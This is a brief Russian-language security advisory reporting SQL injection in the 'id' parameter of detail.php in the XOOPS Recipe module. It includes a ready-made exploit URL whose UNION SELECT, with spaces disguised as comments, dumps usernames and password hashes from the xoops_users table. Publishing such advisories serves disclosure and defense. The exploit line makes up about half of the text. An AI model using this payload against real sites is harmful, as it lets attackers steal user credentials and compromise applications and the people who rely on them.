Программа: XOOPS Module Recipe

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием detail.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2F select/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*



Оставить мнение